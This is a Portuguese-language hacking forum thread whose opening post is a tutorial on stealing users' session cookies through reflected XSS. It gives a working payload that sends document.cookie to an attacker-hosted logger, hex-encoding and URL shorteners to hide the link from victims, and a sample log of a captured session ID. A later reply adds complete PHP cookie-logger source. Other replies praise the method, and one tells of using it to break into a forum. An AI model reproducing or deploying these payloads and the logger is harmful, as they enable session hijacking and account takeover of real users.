Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

roubar cookies

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial roubar cookies

    Construindo um "CookieLogger" para roubar cookies por XSS


    Bem, quando se acha algum site vulneravel a XSS, alguns nem dão tanta importância, por considerarem uma falha leve, porém essa falha vem sido amplamente explorada ultimamente, se alguma rede social possui ela, significa comprometimento total das contas dos usuarios, e caso você ache ela sem utilidade, está enganado, com ela você pode ter acesso aos cookies dos outros membros do site "vulneravel", e de contas dos administradores também, aqui estarei explicando um pouco sobre como utilizar o XSS para roubar cookies.

    Como saber se o site é vulneravel?
    Bem geralmente os sites pegam os dados por modo GET, e jogam diretamente na pagina sem ser tratado corretamente, o resultado é a possibildade da injeção do codigo na pagina vulneravel, para saber se o site é ou não, você deverá utilizar um script de alert comum, adicionando na parte onde o dado é pego, Ex:
    http://www.sitevulneravel.com/busca.php?pesquisa="campo vulneravel"
    a variavel pesquisa=, pega o dado por GET, e joga na pagina sem ser tratado, causando a falha de XSS, agora que sabemos como identificar se é ou não vulneravel, devemos, testaremos a falha, adicionando o script que causa um alert, na variavel:
    Script:

    "><script>alert("Xss - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... do hacker.com")</script>
    Ficando assim:
    http://www.sitevulneravel.com/busca.php?pesquisa="><script>alert("Xss - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...[/QUOTE] = O site onde estara hospedado o seu cookie logger

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    = O site onde a vitima será redirecionada após os dados serem armazenados.

    Ficando assim:

    http://www.sitevulneravel.com/busca.php?pesquisa="><script language= "JavaScript">document.location="http://sitedocookielogger.com/cookielogger.php?cookie=" + document.cookie;document.location="http://www.sitequeredirecionara.com"</script>

    Daí é só você mandar o codigo para a vitima, que os dados dela serão roubados...
    Obs: para a vitima não desconfiar dos codigos maliciosos, você pode converter o para codigos hexadecimais, ficando assim:
    http://www.sitevulneravel.com/busca.php?pesquisa=%22%3e%3c%73%63%72%69%70%74%20% 6c%61%6e%67%75%61%67%65%3d%20%22%4a%61%76%61%53%63 %72%69%70%74%22%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6 f%63%61%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%73% 69%74%65%64%6f%63%6f%6f%6b%69%65%6c%6f%67%67%65%72 %2e%63%6f%6d%2f%63%6f%6f%6b%69%65%6c%6f%67%67%65%7 2%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%22%20%2b%20% 64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%64 %6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3 d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%73%69%74%65% 71%75%65%72%65%64%69%72%65%63%69%6f%6e%61%72%61%2e %63%6f%6d%22%3c%2f%73%63%72%69%70%74%3e
    tornando o codigo malicioso mais ofuscado, site que transforma para hexadecimal:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Ou você pode usar um encurtador de url para a vitima não ver o codigo, ta ai uma lista de encurtadores:
    Tinyurl
    Migre-me
    Blogssa
    Tiny
    Snipurl
    Moourl
    Is.gd
    Miud.in
    goo.gl
    Depois de armazenados os dados no txt, o resultado será esse:

    Código:
    IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://www.ifa.org.nz/search.php |  
    
    DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373
    Bem é isso pessoal, usem com moderação!

    Fonte: Pesquisa na web

  • Font Size
    #2
    mto util vai ajudar muita gente Jonatan ST's otimo post : )

    Comment


    • Font Size
      #3
      Muito bom !! gostei, parabens !


      Comment


      • Font Size
        #4
        Belo tutorial.

        Parabéns


        *******************************************
        #! Perl - PHP - Python !#
        *******************************************
        r00t@ʤῲʪƷ#~> Zone-H

        Comment


        • Font Size
          #5
          Muito bom!
          Você está ensinando de forma muito fácil, Eu não conhecia direito essa técnica mas agora...
          Quem não conseguir entender a vulnerabilidade XSS com esse tópico, se mate.
          Obrigado.
          "Não me sinto obrigado a acreditar que o mesmo Deus que nos dotou de sentidos, razão e intelecto, pretenda que não os utilizemos."
          - Galileu Galilei

          Comment


          • Font Size
            #6
            Muito bom esse tuto em lek...
            Vlew

            FalcoOmxD


            "stay hungry stay foolish" - Um perfeito círculo virtuoso, talvez utópico, mas alcançável.
            Steve Jobs

            Comment


            • Font Size
              #7
              Muito bom continue assim.

              Comment


              • Font Size
                #8
                cara muito bom, parabéns pelo tutor


                Comment


                • Font Size
                  #9
                  eu nao entendi nada.

                  Comment


                  • Font Size
                    #10
                    excelente Post cara ( Vai ajudar muito )

                    Comment


                    • Font Size
                      #11
                      Excelente post, valew por compartilhar com a gente!

                      Como o amigo ai de cima disse, vai ajudar bastante nos estudos =D

                      Comment


                      • Font Size
                        #12
                        Usei esta tecnica pra hackear um forum chamado seizu anos atraz... muito boa mesmo
                        Apesar do principio ser o mesmo a abordagem era um pouco diferente....
                        Mas Vlw pelo post.

                        Comment


                        • Font Size
                          #13
                          Alguem posta aqui pra mim um site que possa hospedar o cookielogger
                          "Algumas pessoas se prendem a seus Palms e PCs de bolso, mas a experiência realmente envolvente acontece num computador com tela grande."


                          sigpic

                          #AntiSec
                          J01N US

                          Comment


                          • Font Size
                            #14
                            Muito bom , mas no final do código vc podia ter colocado um header para mandar pra outra página, para conseguir se tornar mais flexivel em uma engenharia social :

                            <?php
                            function GetIP()
                            {
                            if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
                            $ip = getenv("HTTP_CLIENT_IP");
                            else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
                            $ip = getenv("HTTP_X_FORWARDED_FOR");
                            else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
                            $ip = getenv("REMOTE_ADDR");
                            else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
                            $ip = $_SERVER['REMOTE_ADDR'];
                            else
                            $ip = "unknown";
                            return($ip);
                            }

                            function logData()
                            {
                            $ipLog="log.txt";
                            $cookie = $_SERVER['QUERY_STRING'];
                            $register_globals = (bool) ini_get('register_gobals');
                            if ($register_globals) $ip = getenv('REMOTE_ADDR');
                            else $ip = GetIP();

                            $rem_port = $_SERVER['REMOTE_PORT'];
                            $user_agent = $_SERVER['HTTP_USER_AGENT'];
                            $rqst_method = $_SERVER['METHOD'];
                            $rem_host = $_SERVER['REMOTE_HOST'];
                            $referer = $_SERVER['HTTP_REFERER'];
                            $date=date ("l dS of F Y h:i:s A");
                            $log=fopen("$ipLog", "a+");

                            if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
                            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
                            ");
                            else
                            fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
                            fclose($log);
                            header( 'Location: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...' ) ;
                            }

                            logData();

                            ?>

                            --Abrçs

                            Comment

                            X
                            Working...
                            X